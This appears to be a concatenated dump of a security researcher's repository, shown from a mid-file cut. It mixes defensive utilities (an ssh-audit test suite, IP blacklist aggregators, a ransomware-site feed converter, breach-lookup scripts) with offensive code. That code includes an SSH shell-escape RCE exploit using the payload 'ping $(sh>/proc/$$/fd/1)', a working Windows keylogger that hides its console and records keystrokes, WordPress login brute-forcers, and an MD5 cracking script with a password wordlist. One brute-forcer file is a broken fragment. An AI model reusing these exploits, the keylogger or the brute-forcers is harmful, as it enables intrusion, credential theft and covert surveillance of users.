6 | exit 1 7 | fi 8 | if [ X"$1" == X"" ]; then 9 | _file="${_cdir}/../ssh-audit.py" 10 | else 11 | _file="$1" 12 | fi 13 | prospector -E --profile-path "${_cdir}" -P prospector "${_file}" 14 | -------------------------------------------------------------------------------- /SSH-Audit/test/prospector.yml: -------------------------------------------------------------------------------- 1 | strictness: veryhigh 2 | doc-warnings: false 3 | 4 | pylint: 5 | disable: 6 | - multiple-imports 7 | - invalid-name 8 | - trailing-whitespace 9 | 10 | options: 11 | max-args: 8 # default: 5 12 | max-locals: 20 # default: 15 13 | max-returns: 6 14 | max-branches: 15 # default: 12 15 | max-statements: 60 # default: 50 16 | max-parents: 7 17 | max-attributes: 8 # default: 7 18 | min-public-methods: 1 # default: 2 19 | max-public-methods: 20 20 | max-bool-expr: 5 21 | max-nested-blocks: 6 # default: 5 22 | max-line-length: 80 # default: 100 23 | ignore-long-lines: ^\s*(#\s+type:\s+.*|[A-Z0-9_]+\s+=\s+.*|('.*':\s+)?\[.*\],?)$ 24 | max-module-lines: 2500 # default: 10000 25 | 26 | pep8: 27 | disable: 28 | - W191 # indentation contains tabs 29 | - W293 # blank line contains whitespace 30 | - E101 # indentation contains mixed spaces and tabs 31 | - E401 # multiple imports on one line 32 | - E501 # line too long 33 | - E221 # multiple spaces before operator 34 | 35 | pyflakes: 36 | disable: 37 | - F401 # module imported but unused 38 | - F821 # undefined name 39 | 40 | mccabe: 41 | options: 42 | max-complexity: 15 43 | -------------------------------------------------------------------------------- /SSH-Audit/test/test_banner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | import pytest 4 | 5 | 6 | # pylint: disable=line-too-long,attribute-defined-outside-init 7 | class TestBanner(object): 8 | @pytest.fixture(autouse=True) 9 | def init(self, ssh_audit): 10 | self.ssh = ssh_audit.SSH 11 | 12 | def 
test_simple_banners(self): 13 | banner = lambda x: self.ssh.Banner.parse(x) # noqa 14 | b = banner('SSH-2.0-OpenSSH_7.3') 15 | assert b.protocol == (2, 0) 16 | assert b.software == 'OpenSSH_7.3' 17 | assert b.comments is None 18 | assert str(b) == 'SSH-2.0-OpenSSH_7.3' 19 | b = banner('SSH-1.99-Sun_SSH_1.1.3') 20 | assert b.protocol == (1, 99) 21 | assert b.software == 'Sun_SSH_1.1.3' 22 | assert b.comments is None 23 | assert str(b) == 'SSH-1.99-Sun_SSH_1.1.3' 24 | b = banner('SSH-1.5-Cisco-1.25') 25 | assert b.protocol == (1, 5) 26 | assert b.software == 'Cisco-1.25' 27 | assert b.comments is None 28 | assert str(b) == 'SSH-1.5-Cisco-1.25' 29 | 30 | def test_invalid_banners(self): 31 | b = lambda x: self.ssh.Banner.parse(x) # noqa 32 | assert b('Something') is None 33 | assert b('SSH-XXX-OpenSSH_7.3') is None 34 | 35 | def test_banners_with_spaces(self): 36 | b = lambda x: self.ssh.Banner.parse(x) # noqa 37 | s = 'SSH-2.0-OpenSSH_4.3p2' 38 | assert str(b('SSH-2.0-OpenSSH_4.3p2 ')) == s 39 | assert str(b('SSH-2.0- OpenSSH_4.3p2')) == s 40 | assert str(b('SSH-2.0- OpenSSH_4.3p2 ')) == s 41 | s = 'SSH-2.0-OpenSSH_4.3p2 Debian-9etch3 on i686-pc-linux-gnu' 42 | assert str(b('SSH-2.0- OpenSSH_4.3p2 Debian-9etch3 on i686-pc-linux-gnu')) == s 43 | assert str(b('SSH-2.0-OpenSSH_4.3p2 Debian-9etch3 on i686-pc-linux-gnu ')) == s 44 | assert str(b('SSH-2.0- OpenSSH_4.3p2 Debian-9etch3 on i686-pc-linux-gnu ')) == s 45 | 46 | def test_banners_without_software(self): 47 | b = lambda x: self.ssh.Banner.parse(x) # noqa 48 | assert b('SSH-2.0').protocol == (2, 0) 49 | assert b('SSH-2.0').software is None 50 | assert b('SSH-2.0').comments is None 51 | assert str(b('SSH-2.0')) == 'SSH-2.0' 52 | assert b('SSH-2.0-').protocol == (2, 0) 53 | assert b('SSH-2.0-').software == '' 54 | assert b('SSH-2.0-').comments is None 55 | assert str(b('SSH-2.0-')) == 'SSH-2.0-' 56 | 57 | def test_banners_with_comments(self): 58 | b = lambda x: self.ssh.Banner.parse(x) # noqa 59 | assert 
repr(b('SSH-2.0-OpenSSH_7.2p2 Ubuntu-1')) == '' 60 | assert repr(b('SSH-1.99-OpenSSH_3.4p1 Debian 1:3.4p1-1.woody.3')) == '' 61 | assert repr(b('SSH-1.5-1.3.7 F-SECURE SSH')) == '' 62 | 63 | def test_banners_with_multiple_protocols(self): 64 | b = lambda x: self.ssh.Banner.parse(x) # noqa 65 | assert str(b('SSH-1.99-SSH-1.99-OpenSSH_3.6.1p2')) == 'SSH-1.99-OpenSSH_3.6.1p2' 66 | assert str(b('SSH-2.0-SSH-2.0-OpenSSH_4.3p2 Debian-9')) == 'SSH-2.0-OpenSSH_4.3p2 Debian-9' 67 | assert str(b('SSH-1.99-SSH-2.0-dropbear_0.5')) == 'SSH-1.99-dropbear_0.5' 68 | assert str(b('SSH-2.0-SSH-1.99-OpenSSH_4.2p1 SSH Secure Shell (non-commercial)')) == 'SSH-1.99-OpenSSH_4.2p1 SSH Secure Shell (non-commercial)' 69 | assert str(b('SSH-1.99-SSH-1.99-SSH-1.99-OpenSSH_3.9p1')) == 'SSH-1.99-OpenSSH_3.9p1' 70 | -------------------------------------------------------------------------------- /Threat_Blacklisted_Collection/README.md: -------------------------------------------------------------------------------- 1 | # ThreatCollection-PublicSources 2 | 3 | ThreatCollection_Blacklisted_Small.py will create a list of about 30,000 de-duplicated bad actors from public IP blacklist for your infosec needs. 4 | 5 | ThreatCollection_Blacklisted_BigData.py will create a list of about 200,000 de-duplicated bad actors from public IP blacklist for your big data infosec needs. 6 | 7 | *(ThreatCollection_Blacklisted_BigData.py takes about 20+ minutes to run. 
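So...)* 8 | 9 | ![Alt text](https://imgs.xkcd.com/comics/compiling.png) 10 | 11 | ##Usage 12 | python ThreatCollection_Blacklisted_Small.py 13 | or 14 | python ThreatCollection_Blacklisted_BigData.py 15 | 16 | 17 | 18 | 19 | 
# -------------------------------------------------------------------------------- /Threat_Blacklisted_Collection/ThreatCollection_Blacklisted_BigData.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
# Name: Bigdata Analytics - Threat Collection
# Purpose: Creates a list of Bad Actors from IP Blacklist
#
# Python 2 script (it imports urlopen from urllib).
#
# Trust note: most feeds below are fetched over plain HTTP and none of them
# is authenticated, so anyone on the network path, or anyone who controls a
# feed, decides what ends up in the output. Treat reallybadactors.txt as
# untrusted data: review it, and exclude your own and reserved address
# space, before loading it into a firewall, proxy or SIEM.


from contextlib import closing
from urllib import urlopen
import os
import re
import subprocess
import sys
import time

OUTPUT_FILE = 'reallybadactors.txt'

# Four dot-separated groups of one to three digits; the octet range is
# checked separately in extract_ips().
IPV4_CANDIDATE = re.compile(r'(?:\d{1,3}\.){3}\d{1,3}')


def color(text, color_code):
    """Wrap text in an ANSI colour escape, except on a plain Windows console."""
    if sys.platform == "win32" and os.getenv("TERM") != "xterm":
        return text

    return '\x1b[%dm%s\x1b[0m' % (color_code, text)


def red(text):
    return color(text, 31)


def blue(text):
    return color(text, 34)


def extract_ips(text):
    """Return the IPv4 addresses found in text, in order of appearance.

    The original joined all matches of a line into one string, so a line
    holding two addresses produced a single unusable token. Each address is
    now returned on its own, and candidates with an octet above 255 (which
    the pattern alone accepts) are dropped.
    """
    return [candidate for candidate in IPV4_CANDIDATE.findall(text)
            if all(int(octet) <= 255 for octet in candidate.split('.'))]


try:
    os.remove(OUTPUT_FILE)
except OSError:
    pass

print('\n')

urlss = ["http://rules.emergingthreats.net/blockrules/compromised-ips.txt",
         "http://www.blocklist.de/lists/bruteforcelogin.txt",
         "http://dragonresearchgroup.org/insight/sshpwauth.txt",
         "http://dragonresearchgroup.org/insight/vncprobe.txt",
         "http://www.openbl.org/lists/base.txt",
         "http://www.nothink.org/blacklist/blacklist_malware_http.txt",
         "http://www.nothink.org/blacklist/blacklist_ssh_all.txt",
         "http://antispam.imp.ch/spamlist",
         "http://www.dshield.org/ipsascii.html?limit=10000",
         "http://malc0de.com/bl/IP_Blacklist.txt",
         "http://hosts-file.net/rss.asp",
         "https://feodotracker.abuse.ch/blocklist/?download=ipblocklist",
         "http://reputation.alienvault.com/reputation.data",
         "http://www.binarydefense.com/banlist.txt"]

unique_ips = []     # first-seen order across all feeds
seen = set()        # same addresses, for O(1) membership tests
total_found = 0     # sum of the per-feed counts, duplicates included

for urls in urlss:
    start = time.time()
    print('Checking %s' % urls)

    feed_ips = set()
    try:
        with closing(urlopen(urls)) as copy:
            for text in copy.readlines():
                feed_ips.update(extract_ips(text.rstrip()))
    except IOError as err:
        # One unreachable feed used to abort the whole run; report it and
        # carry on with the remaining feeds.
        print(red('\t\t Skipping feed: %s' % err))
        continue

    for ipaddress in sorted(feed_ips):
        if ipaddress not in seen:
            seen.add(ipaddress)
            unique_ips.append(ipaddress)

    count = len(feed_ips)
    total_found += count
    elapsed = time.time() - start
    print(blue("\t\t Found %s addresses in %.2f seconds." % (count, elapsed)))

print('\nRemoving duplicates from the list!')

# Duplicates are removed in memory, so the intermediate
# badactorsunclean.txt file is no longer needed and blank separator lines
# are no longer counted as addresses.
with open(OUTPUT_FILE, 'w') as outfile:
    for ipaddress in unique_ips:
        outfile.write(ipaddress + "\n")

badips = len(unique_ips)
dupeips = total_found - badips

print("\nFound and removed %s duplicate IP addresses \n" % dupeips)

print('The are %s bad ip addresses in reallybadactors.txt' % badips)

# Open the result with the 'open' command as before, but without going
# through a shell; ignore the error where that command does not exist.
try:
    subprocess.call(['open', OUTPUT_FILE])
except OSError:
    pass
-------------------------------------------------------------------------------- /Threat_Blacklisted_Collection/ThreatCollection_Blacklisted_Small.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Purpose: Creates a list of BadIP Addresses 3 | 4 | 5 | from contextlib import closing 6 | from urllib import urlopen 7 | import os 8 | import re 9 | import time 10 | import sys 11 | 12 | def color(text, color_code): 13 | if sys.platform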
== "win32" and os.getenv("TERM") != "xterm": 14 | return text 15 | 16 | return '\x1b[%dm%s\x1b[0m' % (color_code, text) 17 | 18 | 19 | def red(text): 20 | return color(text, 31) 21 | 22 | def blue(text): 23 | return color(text, 34) 24 | try: 25 | os.remove('badactors.txt') 26 | except OSError: 27 | pass 28 | 29 | fo = open('badactorsunclean.txt', 'w+') 30 | 31 | print'\n' 32 | 33 | urlss = ["http://rules.emergingthreats.net/blockrules/compromised-ips.txt", 34 | "http://www.blocklist.de/lists/bruteforcelogin.txt", 35 | "http://dragonresearchgroup.org/insight/sshpwauth.txt", 36 | "http://dragonresearchgroup.org/insight/vncprobe.txt", 37 | "http://www.openbl.org/lists/base.txt", 38 | "http://www.nothink.org/blacklist/blacklist_malware_http.txt", 39 | "http://www.nothink.org/blacklist/blacklist_ssh_all.txt", 40 | "http://antispam.imp.ch/spamlist", 41 | "http://www.dshield.org/ipsascii.html?limit=10000", 42 | "http://malc0de.com/bl/IP_Blacklist.txt", 43 | "http://hosts-file.net/rss.asp", 44 | "https://feodotracker.abuse.ch/blocklist/?download=ipblocklist", 45 | "http://www.binarydefense.com/banlist.txt"] 46 | 47 | 48 | for urls in urlss: 49 | copy = urlopen(urls) 50 | ips = [] 51 | count = 0 52 | start = time.time() 53 | print ('Checking %s') % (urls) 54 | 55 | with closing(copy): 56 | for text in copy.readlines(): 57 | text = text.rstrip() 58 | regex = re.findall(r'(?:\d{1,3}\.){3}\d{1,3}', text) 59 | if regex is not None and regex not in ips: 60 | ips.append(regex) 61 | 62 | for ip in ips: 63 | ipaddress = "".join(ip) 64 | if ipaddress is not '': 65 | count = count+1 66 | #print (ipaddress) 67 | fo.write(ipaddress) 68 | fo.write("\n") 69 | fo.write("\n") 70 | end = time.time() 71 | elpased = end-start 72 | print(blue("\t\t Found %s addresses in %.2f seconds.")) %(count,elpased) 73 | 74 | fo.close() 75 | 76 | 77 | print('\nRemoving duplicates from the list!') 78 | 79 | lines_seen = set() # holds lines already seen 80 | outfile = open("badactors.txt", "w+") 81 | for 
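line in open("badactorsunclean.txt", "r"): 82 | if line not in lines_seen: # not a duplicate 83 | outfile.write(line) 84 | lines_seen.add(line) 85 | outfile.close() 86 | 87 | with open('badactorsunclean.txt') as ucips: 88 | ucbadips = sum(1 for _ in ucips) 89 | 90 | with open('badactors.txt') as ips: 91 | badips = sum(1 for _ in ips) 92 | 93 | dupeips = (ucbadips-badips) 94 | 95 | print ("\nFound and removed %s duplicate IP addresses \n") %dupeips 96 | 97 | print ('The are %s bad ip addresses in badactors.txt') % badips 98 | 99 | os.remove("badactorsunclean.txt") 100 | os.system("open " + "badactors.txt") 101 | -------------------------------------------------------------------------------- /Threatfeeds-Automation/RansomePaymentGatewayfeeds/Readme.md: -------------------------------------------------------------------------------- 1 | Enumerating the .onion websites, and combine the data with Web2Tor gateways that are commonly used by 2 | malware authors, and compile a suggested notification or block list. 3 | 4 | Our goal is to combine this useful data into actionable indicators of warnings for IT/IR teams to use 5 | in their IDS or SIEM. 6 | -------------------------------------------------------------------------------- /Threatfeeds-Automation/RansomePaymentGatewayfeeds/ransomepaymentfeeds.py: --------------------------------------------------------------------------------
#!/usr/bin/python
# Downloads the ransomware payment-site feed and writes it out as a
# two-column CSV (domain, notes) for use as a lookup file.
import requests

FEED_URL = 'https://files.deependresearch.org/feeds/ransomware/ransomware-payment-sites.txt'

if __name__ == '__main__':
    # Certificate verification stays on (the requests default). The original
    # passed verify=False, which lets anyone on the network path alter the
    # feed and, through it, the block list built from it.
    response = requests.get(FEED_URL, timeout=30)
    # Stop on an HTTP error instead of turning an error page into indicators.
    response.raise_for_status()
    feed_file = response.content

    rows = ['domain,notes\n']
    for line in feed_file.splitlines():
        line = line.strip()
        # Skip comments and anything that cannot be a host name.
        if line.startswith('#') or '.' not in line:
            continue
        # The feed is external data written straight into a CSV: drop entries
        # holding a comma or quote, which would shift the lookup's columns.
        if ',' in line or '"' in line:
            continue
        rows.append('%s,Suspected Ransomware Payment Site\n' % line)

    with open('ransomware_payment_site.csv', 'w') as fh:
        fh.write(''.join(rows))

# To use the CSV in Splunk, load it as a lookup and query it with the
# 'inputlookup' command.
-------------------------------------------------------------------------------- /VirusTotal_Automation/readme.md: -------------------------------------------------------------------------------- 1 | ### VirusTotal.py ? 2 | 3 | Virustotal.py is a python script that will automatically lookup all files contained in a directory on virustotal.com 4 | 5 | # Usage 6 | 7 | python Virustotal.py ../Directory/To/Scan 8 | 9 | python Virustotal.py /media/usb/ 10 | 11 | 12 | # Notes 13 | You will need an API Key from Virustotal.com for this script to work: 14 | https://www.virustotal.com/en/documentation/public-api/ 15 | 16 | For ease of use past key into API_KEY ='' on Line11. 17 | 18 | 19 | #Important Notice 20 | *VirusTotal scanning.......!!!!* 21 | 22 | -------------------------------------------------------------------------------- /Wordpress_Bruteforce_Scripts/WordpressLoginBruteforcer/h.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import sys 4 | import argparse 5 | #test 6 | 7 | def test_login(username,url,falseValue): 8 | payload ={"log":username,"pwd":"fu"} 9 | r = requests.post(url,data=payload) 10 | m= re.search(falseValue,r.text) 11 | if m is None: 12 | if(r.status_code==404): 13 | print "Error page not found, will exit, try to put a valid url or false value" 14 | sys.exit(0) 15 | return True 16 | return False 17 | if args.url==False or args.falseValue==False: 18 | print "RTFM" 19 | sys.exit(0) 20 | 21 | 22 | file = open("dict.txt")) 23 | line = file.readline() 24 | while line: 25 | if(args.verbose): 26 | print "Trying with : %s"%(line) 27 | if(test_login(line,args.url,args.falseValue)): 28 | print "Found a valid login with : %s"%(line)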
29 | sys.exit(1) 30 | else: 31 | line = file.readline() 32 | file.close() 33 | 34 | if(args.bruteforce): 35 | print "foo" 36 | 37 | -------------------------------------------------------------------------------- /Wordpress_Bruteforce_Scripts/WordpressLoginBruteforcer/script.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import sys 4 | import argparse 5 | #test 6 | 7 | def test_login(username,url,falseValue): 8 | payload ={"log":username,"pwd":"fu"} 9 | r = requests.post(url,data=payload) 10 | m= re.search(falseValue,r.text) 11 | if m is None: 12 | if(r.status_code==404): 13 | print "Error page not found, will exit, try to put a valid url or false value" 14 | sys.exit(0) 15 | return True 16 | return False 17 | 18 | parser = argparse.ArgumentParser() 19 | 20 | parser.add_argument("--url", "-u", action="store", dest="url", help="The url where you want to test the bruteforce") 21 | parser.add_argument("--false","-f",action="store", dest="falseValue", help="The string that return false when you try a random login") 22 | parser.add_argument("--wordlist","-w",action="store",dest="wordlist",help="The wordlist to do the dictionnary attack") 23 | parser.add_argument("--bruteforce","-b",action="store_true",dest="bruteforce",help="Do a pure bruteforce, if dictionnary is selected bruteforce will occur after") 24 | parser.add_argument("--all","-a",action="store_true",dest="all",help="Test all the words even if found a valid one. 
Default value is false the script will exit on first found") 25 | parser.add_argument("--verbose","-v",action="store_true",dest="verbose",help="Verbose mode is where I talk to you Human") 26 | 27 | args = parser.parse_args() 28 | 29 | if args.url==False or args.falseValue==False: 30 | print "RTFM" 31 | sys.exit(0) 32 | 33 | if(args.wordlist): 34 | file = open(args.wordlist) 35 | line = file.readline() 36 | while line: 37 | if(args.verbose): 38 | print "Trying with : %s"%(line) 39 | 40 | if(test_login(line,args.url,args.falseValue)): 41 | print "Found a valid login with : %s"%(line) 42 | sys.exit(1) 43 | else: 44 | line = file.readline() 45 | file.close() 46 | 47 | if(args.bruteforce): 48 | print "foo" 49 | 50 | sys.exit(0) 51 | -------------------------------------------------------------------------------- /Wordpress_Bruteforce_Scripts/WordpressPasswordBruteforcer/script.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import sys 4 | import argparse 5 | 6 | 7 | def test_login(username,password,url,falseValue): 8 | payload ={"log":username,"pwd":password} 9 | r = requests.post(url,data=payload) 10 | m= re.search(falseValue,r.text) 11 | if m is not None: 12 | if(r.status_code==404): 13 | print "Error page not found, will exit, try to put a valid url or false value" 14 | sys.exit(0) 15 | return False 16 | return True 17 | 18 | parser = argparse.ArgumentParser() 19 | 20 | parser.add_argument("--url", "-u", action="store", dest="url", help="The url where you want to test the bruteforce") 21 | parser.add_argument("--false","-f",action="store", dest="falseValue", help="The string that return false when you try a random login") 22 | parser.add_argument("--wordlist","-w",action="store",dest="wordlist",help="The wordlist to do the dictionnary attack") 23 | parser.add_argument("--bruteforce","-b",action="store_true",dest="bruteforce",help="Do a pure bruteforce, if dictionnary is selected bruteforce 
will occur after") 24 | parser.add_argument("--all","-a",action="store_true",dest="all",help="Test all the words even if found a valid one. Default value is false the script will exit on first found") 25 | parser.add_argument("--verbose","-v",action="store_true",dest="verbose",help="Verbose mode is where I talk to you Human") 26 | parser.add_argument("--login","-l",action="store",dest="username",help="The Username to use") 27 | 28 | 29 | args = parser.parse_args() 30 | 31 | if args.url==False or args.falseValue==False or args.username==False: 32 | print "RTFM" 33 | sys.exit(0) 34 | 35 | if(args.wordlist): 36 | file = open(args.wordlist) 37 | line = file.readline() 38 | while line: 39 | if(args.verbose): 40 | print "Trying with : %s"%(line) 41 | 42 | if(test_login(args.username,line,args.url,args.falseValue)): 43 | print "Found a valid login with : %s"%(line) 44 | sys.exit(1) 45 | else: 46 | line = file.readline() 47 | file.close() 48 | 49 | if(args.bruteforce): 50 | print "foo" 51 | 52 | sys.exit(0) 53 | -------------------------------------------------------------------------------- /email_hacked.py: -------------------------------------------------------------------------------- 1 | __author__ = "Santhosh Baswa" 2 | __copyright__ = "Copyright 2016, Independent Security Researcher" 3 | import os 4 | import json 5 | import simplejson 6 | import requests 7 | 8 | a = raw_input("Enter the email:") 9 | b = {'q':a} 10 | r = requests.get('https://hacked-emails.com/api', params=b) 11 | res = simplejson.loads(r.text) 12 | a = range(int(res['results'])) 13 | if r.status_code == 200: 14 | print "Email:" , res['query'] 15 | print "Status:" , res['status'] 16 | print "No.of.leaks:", res['results'] 17 | for i in a: 18 | print "Leaked Data : Part-",i+1 19 | print "Title of leak :" , res['data'][i]['title'] 20 | print "Author :" , res['data'][i]['author'] 21 | print "Verified leak :" , res['data'][i]['verified'] 22 | print "Date leaked :" , res['data'][i]['date_leaked'] 23 | 
print "Date published :" , res['data'][i]['date_created'] 24 | print "Network :" , res['data'][i]['source_network'] 25 | print "Site:" , res['data'][i]['source_provider'] 26 | print "File size :" , res['data'][i]['source_size'] % 1024 27 | print "Emails found :" , res['data'][i]['emails_count'] 28 | print "Details:" , res['data'][i]['details'] 29 | print "Source URL:" , res['data'][i]['source_url'] 30 | print "No. of lines :" , res['data'][i]['source_lines'] 31 | print "------------xxxxxxxxxxxxx----------------" 32 | # print "Leak:" , res['data'][0]['title'] 33 | # print "Source Network:", res['data'][0][''] 34 | else: 35 | print "Email:" , res['query'] 36 | print "Status:" , res['status'] 37 | 38 | -------------------------------------------------------------------------------- /escape_shell.py: -------------------------------------------------------------------------------- 1 | __author__ = "Santhosh Baswa" 2 | __copyright__ = "Copyright 2016, Independent Security Research" 3 | __program__ = "Escape Shell (RCE using --> Shell)" 4 | __payload__ = "ping $(sh>/proc/$$/fd/1)" 5 | 6 | import socket 7 | import sys 8 | import paramiko 9 | import threading 10 | 11 | lock = threading.RLock() 12 | payload = "ping $(sh>/proc/$$/fd/1) ?" 
13 | session = None 14 | transport = None 15 | stopbinding = False 16 | 17 | def write(value): 18 | with lock: 19 | sys.stdout.write(value) 20 | sys.stdout.flush() 21 | 22 | def channel_intercept(): 23 | try: 24 | global stopbinding 25 | while True: 26 | if stopbinding: 27 | break 28 | data = session.recv(256) 29 | if not data: 30 | stopbinding = True 31 | transport.close() 32 | write("Press enter to exit...") 33 | break 34 | if "prctl_runCommandInShellWithTimeout" in data: 35 | transport.close() 36 | init() 37 | session.send("%s\n" % payload) 38 | channel_intercept() 39 | else: 40 | write(data) 41 | except KeyboardInterrupt: 42 | stopbinding = True 43 | transport.close() 44 | 45 | def bind_stdin(): 46 | try: 47 | global stopbinding 48 | while True: 49 | d = sys.stdin.read(1) 50 | if not d or stopbinding: 51 | break 52 | session.send(d) 53 | except KeyboardInterrupt: 54 | stopbinding = True 55 | transport.close() 56 | 57 | def init(): 58 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 59 | sock.connect(("192.168.1.1", 22)) # Any IP Address --> Login through SSH 60 | global transport 61 | transport = paramiko.Transport(sock) 62 | try: 63 | transport.start_client() 64 | except paramiko.SSHException: 65 | write("SSH negotiation failed.") 66 | sys.exit(1) 67 | 68 | if not transport.is_authenticated(): 69 | transport.auth_password("username", "password") # Give proper creds to SSH Connection 70 | if not transport.is_authenticated(): 71 | write("Authentication failed.") 72 | transport.close() 73 | sys.exit(1) 74 | 75 | global session 76 | session = transport.open_session() 77 | session.get_pty() 78 | session.invoke_shell() 79 | 80 | init() 81 | writer = threading.Thread(target=channel_intercept) 82 | writer.start() 83 | session.send("%s\n" % payload) # Execute the particular payload in remote server 84 | bind_stdin() 85 | -------------------------------------------------------------------------------- /haveibeenpwned.py: 
-------------------------------------------------------------------------------- 1 | __author__ = "Santhosh Baswa" 2 | __copyright__ = "Copyright 2016, Penetration Testing" 3 | 4 | import requests 5 | import json 6 | import re 7 | import simplejson 8 | a = raw_input("Enter the email:") 9 | r = requests.get("https://haveibeenpwned.com/api/v2/breachedaccount/"+a) 10 | res = json.loads(r.text) 11 | url_pattern = 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' 12 | a = len(res) 13 | if r.status_code == 200: 14 | print "Email:" , a 15 | for i in res: 16 | print "Domain:" , i['Domain'] 17 | print "Leakedaccounts:" , i['PwnCount'] 18 | print "Domain:", i['Domain'] 19 | print "BreachDate:", i['BreachDate'] 20 | print "AddedDate:", i['AddedDate'] 21 | links = i['Description'] 22 | find_links = re.findall(url_pattern, links) 23 | print "Links:", "\n".join([str(x) for x in find_links]) 24 | -------------------------------------------------------------------------------- /keylogger.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | __author__ = "Santhosh Baswa" 3 | __copyright__ = "Copyright 2016, Independent Security Research" 4 | 5 | import win32console 6 | import win32gui 7 | import pythoncom 8 | import pyHook 9 | 10 | win=win32console.GetConsoleWindow() 11 | win32gui.ShowWindow(win,0) 12 | 13 | def OnKeyboardEvent(event): 14 | if event.Ascii==5: 15 | _exit(1) 16 | if event.Ascii !=0 or 8: 17 | f=open('C:\Users\Santhosh\Downloads\output.txt','r+') 18 | buffer=f.read() 19 | f.close() 20 | f=open('C:\Users\Santhosh\Downloads\output.txt','w') 21 | keylogs=chr(event.Ascii) 22 | if event.Ascii==13: 23 | keylogs='/n' 24 | buffer+=keylogs 25 | f.write(buffer) 26 | f.close() 27 | f1 = open('C:\Users\Santhosh\Downloads\output.txt', 'w') 28 | f1.write('Incoming keys:\n') 29 | f1.close() 30 | hm=pyHook.HookManager() 31 | hm.KeyDown=OnKeyboardEvent 32 | hm.HookKeyboard() 33 | 
pythoncom.PumpMessages() 34 | -------------------------------------------------------------------------------- /linkden-company_employee-enumeration/README.md: -------------------------------------------------------------------------------- 1 | linkden_company_employee_enumeration 2 | ===================== 3 | Give it a company id, and it will try to get all employees associated with the company. 4 | -------------------------------------------------------------------------------- /md5_crack_challenge/fuck.py: -------------------------------------------------------------------------------- 1 | import md5 2 | import hashlib 3 | import os 4 | salt = 'shishaclub' 5 | md5_salt = md5.new(salt).hexdigest() 6 | 7 | with open('wordlist.txt','rb') as f: 8 | for password in f: 9 | md5_pass = md5.new(password).hexdigest() 10 | s = str(salt+password.strip()) 11 | s1 = str(password.strip()+salt) 12 | print(s+"="+md5.new(s).hexdigest()) 13 | print(s1+"="+md5.new(s1).hexdigest()) 14 | # print(md5.new(md5_salt+md5_pass).hexdigest()) 15 | -------------------------------------------------------------------------------- /md5_crack_challenge/h.py: -------------------------------------------------------------------------------- 1 | import crypt 2 | salt = 'shishaclub' 3 | with open('wordlist.txt','rb') as f: 4 | for password in f: 5 | print(crypt.crypt(password.strip(),salt)) 6 | -------------------------------------------------------------------------------- /md5_crack_challenge/wordlist.txt: -------------------------------------------------------------------------------- 1 | 123456 2 | 12345 3 | 123456789 4 | password 5 | iloveyou 6 | princess 7 | 1234567 8 | rockyou 9 | 12345678 10 | abc123 11 | nicole 12 | daniel 13 | babygirl 14 | monkey 15 | lovely 16 | jessica 17 | 654321 18 | michael 19 | ashley 20 | qwerty 21 | 111111 22 | iloveu 23 | 000000 24 | michelle 25 | tigger 26 | sunshine 27 | chocolate 28 | password1 29 | soccer 30 | anthony 31 | friends 32 | butterfly 33 | purple 34 
| angel 35 | jordan 36 | liverpool 37 | justin 38 | loveme 39 | fuckyou 40 | 123123 41 | football 42 | secret 43 | andrea 44 | carlos 45 | jennifer 46 | joshua 47 | bubbles 48 | 1234567890 49 | superman 50 | hannah 51 | amanda 52 | loveyou 53 | pretty 54 | basketball 55 | andrew 56 | angels 57 | tweety 58 | flower 59 | playboy 60 | hello 61 | elizabeth 62 | hottie 63 | tinkerbell 64 | charlie 65 | samantha 66 | barbie 67 | chelsea 68 | lovers 69 | teamo 70 | jasmine 71 | brandon 72 | 666666 73 | shadow 74 | melissa 75 | eminem 76 | matthew 77 | robert 78 | danielle 79 | forever 80 | family 81 | jonathan 82 | 987654321 83 | computer 84 | whatever 85 | dragon 86 | vanessa 87 | cookie 88 | naruto 89 | summer 90 | sweety 91 | spongebob 92 | joseph 93 | junior 94 | softball 95 | taylor 96 | yellow 97 | daniela 98 | lauren 99 | mickey 100 | princesa 101 | alexandra 102 | alexis 103 | jesus 104 | estrella 105 | miguel 106 | william 107 | thomas 108 | beautiful 109 | mylove 110 | angela 111 | poohbear 112 | patrick 113 | iloveme 114 | sakura 115 | adrian 116 | alexander 117 | destiny 118 | christian 119 | 121212 120 | sayang 121 | america 122 | dancer 123 | monica 124 | richard 125 | 112233 126 | princess1 127 | 555555 128 | diamond 129 | carolina 130 | steven 131 | rangers 132 | louise 133 | orange 134 | 789456 135 | 999999 136 | shorty 137 | 11111 138 | nathan 139 | snoopy 140 | gabriel 141 | hunter 142 | cherry 143 | killer 144 | sandra 145 | alejandro 146 | buster 147 | george 148 | brittany 149 | alejandra 150 | patricia 151 | rachel 152 | tequiero 153 | 7777777 154 | cheese 155 | 159753 156 | arsenal 157 | dolphin 158 | antonio 159 | heather 160 | david 161 | ginger 162 | stephanie 163 | peanut 164 | blink182 165 | sweetie 166 | 222222 167 | beauty 168 | 987654 169 | victoria 170 | honey 171 | 00000 172 | fernando 173 | pokemon 174 | maggie 175 | corazon 176 | chicken 177 | pepper 178 | cristina 179 | rainbow 180 | kisses 181 | manuel 182 | myspace 183 | rebelde 184 
